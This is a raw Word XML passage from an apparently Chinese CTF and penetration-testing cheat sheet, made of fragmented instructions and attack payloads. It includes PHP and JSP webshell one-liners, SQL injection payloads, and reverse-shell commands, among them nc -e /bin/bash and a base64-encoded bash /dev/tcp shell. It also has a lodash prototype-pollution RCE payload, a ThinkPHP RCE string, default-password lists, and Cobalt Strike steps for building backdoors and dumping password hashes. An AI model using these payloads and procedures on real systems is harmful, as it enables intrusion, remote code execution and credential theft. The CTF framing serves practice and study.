      <w:bookmarkEnd w:id="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最基础一句话木马，配合蚁剑使用：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5" o:spt="75" type="#_x0000_t75" style="height:35pt;width:26.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId269" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1055" DrawAspect="Content" ObjectID="_1468075755" r:id="rId26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shell权限一句话木马，配合cmd指令使用，url后缀为?1=cmd指令（类似?1=cat /flag或者?1=system('tac /f*');）：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6" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId271" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1056" DrawAspect="Content" ObjectID="_1468075756" r:id="rId27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Base64版上传一句话木马文件，访问上传的文件即可get shell，执行读取文件操作，参数为cmd，请求的url后缀为shell.php?cmd=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输入的cmd执行（例如cat /flag或者system('tac /f*');）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7" o:spt="75" type="#_x0000_t75" style="height:35pt;width:39.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId273" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1057" DrawAspect="Content" ObjectID="_1468075757" r:id="rId27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Burpsuite一句话木马请求发送，配合蚁剑使用，主要用来处理没有上传页面只有接口的请求，注意修改接口和url：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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:108pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId275" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1058" DrawAspect="Content" ObjectID="_1468075758" r:id="rId27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PHP一句话读取flag：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59" o:spt="75" type="#_x0000_t75" style="height:35pt;width:33.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId277" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1059" DrawAspect="Content" ObjectID="_1468075759" r:id="rId27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php_everywhere木马，任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求，并在站点上执行任意 PHP 代码，将里面的代码覆盖到网页中的任意位置，保存后在出现的内容点击Execute按钮，之后访问url前缀/fuck.php?cmd=cmd指令（类似/fuck.php?cmd=system('tac /f*');），注意修改里面的url地址：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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:83.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId279" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1060" DrawAspect="Content" ObjectID="_1468075760" r:id="rId27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输入框读文件一句话木马：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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId281" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1061" DrawAspect="Content" ObjectID="_1468075761" r:id="rId28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多种一句话木马混打：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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:36.5pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId283" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1062" DrawAspect="Content" ObjectID="_1468075762" r:id="rId282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文件放在虚拟机桌面后运行：curl -i -s -X POST -F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"mailto:\“logo_file=@shell.pht\”"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“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>logo_file=@shell.pht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/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ur地址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46320" cy="3756660"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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之后访问：url前缀/data/media/labels/shell.pht，或者用剩下几种一句话效果尝试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70100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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PHP小马编写：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$path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$text = $_POST[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$file = fopen($path,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w+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fwrite($file,$text);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&lt;form action=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post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//读取当前文件路径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&lt;?echo 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DOCUMENT_ROOT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].$_SERVER[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PHP_SELF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];?&gt;&lt;/br&gt;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//保存内容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//写入内容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&lt;br&gt;&lt;textarea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cols=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90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rows=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50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&gt;&lt;/textarea&gt;&lt;br&gt;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submit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&lt;/form&gt;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JSP一句话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&lt;%execute request(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)%&gt;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PHP绕过WAF的一句话，原理是利用BASE64拼接后解码出来就是传统一句话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2495550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89" w:name="_Toc31438"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手写SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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</w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc17089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1.json传参形式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90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爆库：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--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2;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08220" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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爆字段：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group_concat(column_name) from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x表名的16进制字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),3,4,5,6,7,8,9,0,1,2; -- "}'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1158240"/>
            <wp:effectExtent l="0" t="0" r="0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爆数据：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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>' \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--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4800600" cy="1127760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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91" w:name="_Toc2853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2.时间盲注脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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注意更改里面的地址和burpsuite拦截的请求header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63" o:spt="75" type="#_x0000_t75" style="height:35pt;width:127.75pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId291" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1063" DrawAspect="Content" ObjectID="_1468075763" r:id="rId290">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270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2" w:name="_Toc15667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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文件读取漏洞：在接口url参数后追加file:/文件名，即url前缀?参数名=file:/文件名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3" w:name="_Toc29734"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nuclei</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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所有CVE都在template文件夹下作为脚本使用，使用指令：nuclei -u url地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4267200" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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4" w:name="_Toc23450"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Xray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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用来扫描制定url下的漏洞，在桌面打开cmd使用指令：./xray_linux_amd64 webscan -u url地址 --ho result.html，即可查看漏洞信息并且结果保存在了桌面的result.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3431540"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="1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3188335"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="1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5" w:name="_Toc31111"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口监听反弹shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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监听指令：nc -lnvp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反弹shell命令：bash -c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bash -i &gt;&amp; url地址 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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&amp;代表指针位置，&gt;等价于1&gt;，也就是说靶机的输出被写到攻击者的机器上（/dev/tcp/&lt;LHOST&gt;/&lt;LPORT&gt;），因此攻击者能够监听到在受害者机器的shell上执行的所有命令的结果，但他自己无法执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="1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666750"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1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netcat: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nc -e /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url地址 端口号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base64：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bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'</w:t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6" w:name="_Toc30545"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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双击cobaltstrike4.5.vbs打开后，输入IP、端口、连接密码后点击连接后点击Yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3253740" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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60520" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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之后点击二级图标，配置好名字、IP、端口后点击保存后弹出框点击OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2951480"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080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491740" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1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点击攻击-&gt;生成后门-&gt;HTA文档，选择监听器监听对象后设置Method后点击生成攻击文件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040" cy="1445895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="166" name="图片 166" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18060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177925"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10795"/>
            <wp:docPr id="1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val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点击攻击-&gt;生成后门-&gt;Payload生成器，同上选择监听器监听对象后设置Method后点击生成攻击文件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1407795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="169" name="图片 169" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18160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同样Windows可执行程序(E)和Windows可执行程序(Stageless)生成方式同上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086100" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="170" name="图片 170" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 182105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双击生成的Windows可执行程序(E)攻击脚本，上方栏出现一条数据，右键该数据点击会话交互新建下方栏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="708660" cy="739140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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2477135"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="172" name="图片 172" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18241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输入：sleep 1避免长时间等待</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3169920" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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删除回话需要先输入exit再右键数据-&gt;会话操作-&gt;删除会话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4608195"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="175" name="图片 175" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 183640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右键管理员权限启动攻击脚本后会显示用户后方加*号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="640715"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="1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右键数据-&gt;浏览数据-&gt;进程列表-&gt;选择进程-&gt;注入-&gt;选择payload-&gt;选择后，会生成对应进程的数据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1463040"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="177" name="图片 177" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18453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870075"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="1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右键数据-&gt;浏览探测-&gt;屏幕截图即可截图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4276725"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5715"/>
            <wp:docPr id="179" name="图片 179" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18494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右键管理员的数据-&gt;凭证提取-&gt;抓取Hash可以看到Hash值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7960" cy="4695825"/>
            <wp:effectExtent l="0" t="0" r="5080" b="13335"/>
            <wp:docPr id="180" name="图片 180" descr="屏幕截图 2023-09-02 18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屏幕截图 2023-09-02 18521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抓取明文密码方式同上，只不过换个子菜单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="1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97" w:name="_Toc14832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web二进制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc13835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1.JaveScript反混淆</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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首先建立一个HTML文件引用js文件。类似下面这种（注意修改引用js文件名）：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&lt;html&gt;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&lt;title&gt;Test&lt;/title&gt;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&lt;/head&gt;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&lt;h1&gt;Test&lt;/h1&gt;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    &lt;script src="./flag.js"&gt;&lt;/script&gt;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 xml:space="preserve">    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="5"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4" w:space="5"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="5"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4" w:space="5"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="96" w:afterAutospacing="0" w:line="17" w:lineRule="atLeast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Style w:val="16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5"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;/html&gt;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之后将js文件格式化并保存，然后与HTML文件放在同一个文件夹下，谷歌浏览器访问HTML文件，之后F12在Source中给js打断点后刷新页面点击Step按钮即可断点执行并查看单步运行结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="1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99" w:name="_Toc19970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2.PHP扩展逆向</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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如果存在so后缀名文件，在反编译工具分析结束后，观察函数列表，寻找关键生命周期函数zm_startup_encrypt_php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1372235"/>
            <wp:effectExtent l="0" t="0" r="0" b="146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分析关键生命周期函数的语义，理解并找到关键 PHP 文件处理函数encrypt_compile_file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0698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 PHP 文件处理函数中的逻辑，并找到关键文件加密函数并通过Python脚本解密保存得到解密PHP文件打开查看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38705"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255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19798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编写解密脚本并进行解密后保存为新的PHP文件并打开，脚本类似下面这样（注意修改为对应的解密算法）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4" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId322" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1064" DrawAspect="Content" ObjectID="_1468075764" r:id="rId321">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1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100" w:name="_Toc6328"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.字节码恢复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/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01" w:name="_Toc6773"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101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在Ubuntu中pyc文件对应的文件夹中打开终端输入：uncompyle6 -o 输出文件名 pyc文件名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1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc25232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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Jar文件直接解压即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1220470"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="1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</w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc2429"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Git_Extract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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python2环境下使用，运行指令：python git_extract.py url地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2915920"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1016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</w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc8551"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NodeJS原型链污染以及模板注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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获取源码并编译，解压压缩包，得到源代码：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381125" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="19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0" descr="IMG_25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在解压得到的文件中，主要的路由以及处理逻辑定义都在server.js中，针对server.js进行分析，可以发现如下的代码段：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app.all('/', (req, res) =&gt;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let data = req.session.data || {language: [], category: []}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(req.method == 'POST')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data = lodash.merge(data, req.body)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req.session.data = data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res.render('index',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language: data.language,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category: data.category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根路径，以POST方式发送数据时，会通过lodash依赖中的merge函数对传入的HTTP数据进行合并，根据我们对于原型链污染利用的学习，lodash.merge函数存在原型链污染漏洞，如果进行合并操作的数据没有经过安全校验，将导致proto键被污染的情况，从而导致危险函数被控制。并且可以发现使用了ejs的template渲染，那么可以通过污染sourceURL来实现利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构造数据完成利用，打开页面，可以看到如下内容：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08270" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="191" name="图片 41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1" descr="IMG_257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点击空白框，任意选择两个值，进行提交，观察提交的数据格式：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63570" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
            <wp:docPr id="187" name="图片 42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2" descr="IMG_258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95600" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="189" name="图片 43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3" descr="IMG_25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因此是符合merge操作的数据需求的。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此时，我们可以按照该请求的格式发送用于原型链污染的数据，结合lodash.template()用法，可以构造出利用数据：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{"__proto__" : {"sourceURL" : "\r\nreturn e = () =&gt; {return global.process.mainModule.constructor._load('child_process').execSync('dir').toString()}\r\n"}}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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5244465" cy="645795"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="188" name="图片 44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4" descr="IMG_260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64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105" w:name="_Toc21575"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>杂七杂八的东西</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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F12查看网站源代码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F12查看网站网络选项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94155"/>
            <wp:effectExtent l="0" t="0" r="635" b="14605"/>
            <wp:docPr id="1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 RCE 漏洞payload：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Index.php?s=/Index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=md5&amp;vars[1][]=3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网站登录通用：用户名admin或者test，密码admin或者123456或者test或者12345678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注入页面判断：表单输入，报错页面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845BE7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE845BE7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1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245FE0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C245FE0E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EED08245"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EED08245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5706A8C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="45706A8C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E5ZjhhMTYwMWU4MDkxZjBhZGEwMDdjNGU3NDRiNjAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="003D69D5"/>
    <w:rsid w:val="012E11C9"/>
    <w:rsid w:val="03944778"/>
    <w:rsid w:val="03C757C6"/>
    <w:rsid w:val="074C3F44"/>
    <w:rsid w:val="078C16E9"/>
    <w:rsid w:val="0B0956D1"/>
    <w:rsid w:val="12AC21C3"/>
    <w:rsid w:val="14397E9E"/>
    <w:rsid w:val="15D31C83"/>
    <w:rsid w:val="18537DAF"/>
    <w:rsid w:val="242B345F"/>
    <w:rsid w:val="27BF53C1"/>
    <w:rsid w:val="2B624A45"/>
    <w:rsid w:val="2DCB384C"/>
    <w:rsid w:val="343A5865"/>
    <w:rsid w:val="34806038"/>
    <w:rsid w:val="35A05F2D"/>
    <w:rsid w:val="36B917AB"/>
    <w:rsid w:val="382A7E1C"/>
    <w:rsid w:val="3B7A0B70"/>
    <w:rsid w:val="3E6C754F"/>
